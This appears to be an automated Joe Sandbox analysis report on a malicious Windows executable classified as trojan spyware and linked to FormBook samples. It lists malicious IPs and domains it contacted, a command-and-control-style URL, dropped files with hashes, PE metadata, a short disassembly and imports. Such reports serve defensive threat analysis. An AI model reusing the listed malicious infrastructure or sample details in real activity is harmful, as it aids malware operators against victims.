                                                https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://funnystory.online/2dyu/?9HaD=bADoicsunattend.exe, 00000007.00000002.3145271641.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.00000000030C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000027284000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://reg.ru?target=_blankicsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.248.169.48
                                                      		www.aktmarket.xyzUnited States
                                                      		16509AMAZON-02UStrue
                                                      209.74.77.108
                                                      		www.urbanxplore.infoUnited States
                                                      		31744MULTIBAND-NEWHOPEUStrue
                                                      104.21.44.16
                                                      		www.3kw40881107247y.clickUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      31.31.196.177
                                                      		www.nartex-uf.onlineRussian Federation
                                                      		197695AS-REGRUtrue
                                                      172.104.82.74
                                                      		funnystory.onlineUnited States
                                                      		63949LINODE-APLinodeLLCUStrue
                                                      107.167.84.42
                                                      		cssa.auctionUnited States
                                                      		53755IOFLOODUStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1561727
                                                      Start date and time:2024-11-24 08:11:42 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 37s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:VSP469620.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@14/6
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 91%
                                                      • Number of executed functions: 54
                                                      • Number of non-executed functions: 294
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      13.248.169.48CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/cpgr/
                                                      Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/stx5/
                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/k1td/
                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                      • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.remedies.pro/hrap/
                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.optimismbank.xyz/lnyv/
                                                      New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                      • www.avalanchefi.xyz/ctta/
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • www.egldfi.xyz/3e55/
                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/010v/
                                                      Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                      • www.wajf.net/dkz5/
                                                      209.74.77.108CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.mindfulmo.life/grm8/
                                                      Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                      • www.hobbihub.info/i5gf/
                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                      • www.mindfulmo.life/grm8/
                                                      31.31.196.177https://www.vulcnmold.com/cy/Get hashmaliciousHTMLPhisherBrowse
                                                        JoJbc8KfjQ.exeGet hashmaliciousDCRatBrowse
                                                          0eLsT7swLh.exeGet hashmaliciousDCRatBrowse
                                                            107.167.84.42Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.cssa.auction/g4fs/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.3kw40881107247y.clickQuotation.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.192.207
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.192.207
                                                            www.a1shop.shopSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.168.228
                                                            Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 104.21.67.152
                                                            TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.76.162
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.162.84
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.174.133
                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                            • 104.21.74.61
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.162.84
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 172.67.160.80
                                                            WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                            • 172.67.165.138
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.33.116
                                                            AMAZON-02USCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 76.223.74.74
                                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 3.122.148.244
                                                            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 13.223.155.145
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 18.243.54.8
                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 15.206.178.249
                                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 3.99.230.17
                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                            • 3.167.69.129
                                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 35.74.17.116
                                                            sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 54.126.105.86
                                                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 44.226.3.74
                                                            AS-REGRUCV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                            • 31.31.196.17
                                                            HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                            • 31.31.198.145
                                                            Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                            • 194.58.112.173
                                                            F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 195.133.18.88
                                                            PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                            • 31.31.196.17
                                                            Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                            • 194.58.112.174
                                                            PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 194.58.42.154
                                                            MULTIBAND-NEWHOPEUSCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.108
                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            payments.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.108
                                                            http://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                            • 209.74.95.101
                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.108
                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\2780E4D

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\icsunattend.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1211596417522893
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\aut4E21.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\VSP469620.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288768
                                                            Entropy (8bit):7.993425754498643
                                                            Encrypted:true
                                                            SSDEEP:6144:f7a5+JbCu/g0r6xNH9eFGJ8sxyONXXO5S4VBGWPqZkfqPTCCu:f258Ou/gO0J9eg/BXniwWPbqLCJ
                                                            MD5:273F9AF6EA744FC3D3F6A5457A7403F6
                                                            SHA1:1CAF849FB6707A28B08B0E567B4453322AAF3987
                                                            SHA-256:68336F1C58CC864332FEFD6B55C7CB8D797BEBCE9E491B2E15441434A125F30C
                                                            SHA-512:191AE1E45FD022D962F919A9B7938AB64A7E41C6B5B5648F12429376AA2AA0C4F942161D52D2D9BCB2B4FBE0E6D4179C35B733E7763AD56EF1626F0575C85CEE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:z..H[TXZ01SP..DL.XTXZ41S.57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ.1SP;(.BH.].{.0...c,%;x$*5SC2=.T%"&7 x8Q.!%[.-"h...zY^75.:IFlXTXZ41S)4>.q(?.e:S.n0R.^..n8=.+....$+.B...Q4.g^'$u83.Z41SP57D..XT.[51<t.hDLHXTXZ4.SR4<EGHX.\Z41SP57DL.LTXZ$1SPE3DLH.TXJ41SR57BLHXTXZ47SP57DLHX$\Z43SP57DLJX..Z4!SP%7DLHHTXJ41SP57TLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLf,1 .41S.a3DLXXTX.01S@57DLHXTXZ41SP5.DL(XTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP

                                                            C:\Users\user\AppData\Local\Temp\woolpress

                                                            Download File
                                                            Process:C:\Users\user\Desktop\VSP469620.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288768
                                                            Entropy (8bit):7.993425754498643
                                                            Encrypted:true
                                                            SSDEEP:6144:f7a5+JbCu/g0r6xNH9eFGJ8sxyONXXO5S4VBGWPqZkfqPTCCu:f258Ou/gO0J9eg/BXniwWPbqLCJ
                                                            MD5:273F9AF6EA744FC3D3F6A5457A7403F6
                                                            SHA1:1CAF849FB6707A28B08B0E567B4453322AAF3987
                                                            SHA-256:68336F1C58CC864332FEFD6B55C7CB8D797BEBCE9E491B2E15441434A125F30C
                                                            SHA-512:191AE1E45FD022D962F919A9B7938AB64A7E41C6B5B5648F12429376AA2AA0C4F942161D52D2D9BCB2B4FBE0E6D4179C35B733E7763AD56EF1626F0575C85CEE
                                                            Malicious:false
                                                            Preview:z..H[TXZ01SP..DL.XTXZ41S.57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ.1SP;(.BH.].{.0...c,%;x$*5SC2=.T%"&7 x8Q.!%[.-"h...zY^75.:IFlXTXZ41S)4>.q(?.e:S.n0R.^..n8=.+....$+.B...Q4.g^'$u83.Z41SP57D..XT.[51<t.hDLHXTXZ4.SR4<EGHX.\Z41SP57DL.LTXZ$1SPE3DLH.TXJ41SR57BLHXTXZ47SP57DLHX$\Z43SP57DLJX..Z4!SP%7DLHHTXJ41SP57TLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLf,1 .41S.a3DLXXTX.01S@57DLHXTXZ41SP5.DL(XTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.140735037435853
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:VSP469620.exe
                                                            File size:1'207'808 bytes
                                                            MD5:e4cb2ac542d27b0c73c5a290bf5ffe77
                                                            SHA1:0340de260b7364564c4c3480b0489d4edf431a3e
                                                            SHA256:9060815773bcc67db557cd691aeb3c74d471008e7c9388d13c7b03468b11dcfe
                                                            SHA512:bd1899f9b7cd635cae29dce079a07580d4b77a3de44a36a1e911bc7aabd7f957d7261a26df68495ce9b8a8f439b06f04de4f4d008ef97df831abbe6018c668a0
                                                            SSDEEP:24576:Wtb20pkaCqT5TBWgNQ7a98yboib3Me3lJa/6A:DVg5tQ7a980Db8eVC5
                                                            TLSH:5845CF1363DEC361C3B25273BA657701AEBF782506B1F96B2FD8093DF820162525E663
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                            File Icon

                                                            Icon Hash:aaf3e3e3938382a0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x425f74
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x673F1312 [Thu Nov 21 11:01:38 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007FFB144D817Fh
                                                            jmp 00007FFB144CB194h
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007FFB144CB31Ah
                                                            cmp edi, eax
                                                            jc 00007FFB144CB67Eh
                                                            bt dword ptr [004C0158h], 01h
                                                            jnc 00007FFB144CB319h
                                                            rep movsb
                                                            jmp 00007FFB144CB62Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007FFB144CB4E4h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007FFB144CB320h
                                                            bt dword ptr [004BA370h], 01h
                                                            jc 00007FFB144CB7F0h
                                                            bt dword ptr [004C0158h], 00000000h
                                                            jnc 00007FFB144CB4BDh
                                                            test edi, 00000003h
                                                            jne 00007FFB144CB4CEh
                                                            test esi, 00000003h
                                                            jne 00007FFB144CB4ADh
                                                            bt edi, 02h
                                                            jnc 00007FFB144CB31Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007FFB144CB323h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007FFB144CB375h
                                                            bt esi, 03h
                                                            jnc 00007FFB144CB3C8h
                                                            movdqa xmm1, dqword ptr [esi+00h]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2012 UPD4 build 61030
                                                            • [RES] VS2012 UPD4 build 61030
                                                            • [LNK] VS2012 UPD4 build 61030

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5dd54.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c4c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc40000x5dd540x5de000999152663d63b9878785baa32bc078dFalse0.9302492509986684data7.899420632109369IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x1220000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xcc7b80x55059data1.000333094998119
                                                            RT_GROUP_ICON0x1218140x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x12188c0x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x1218a00x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x1218b40x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x1218c80xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x1219a40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                            Imports

                                                            DLLImport
                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
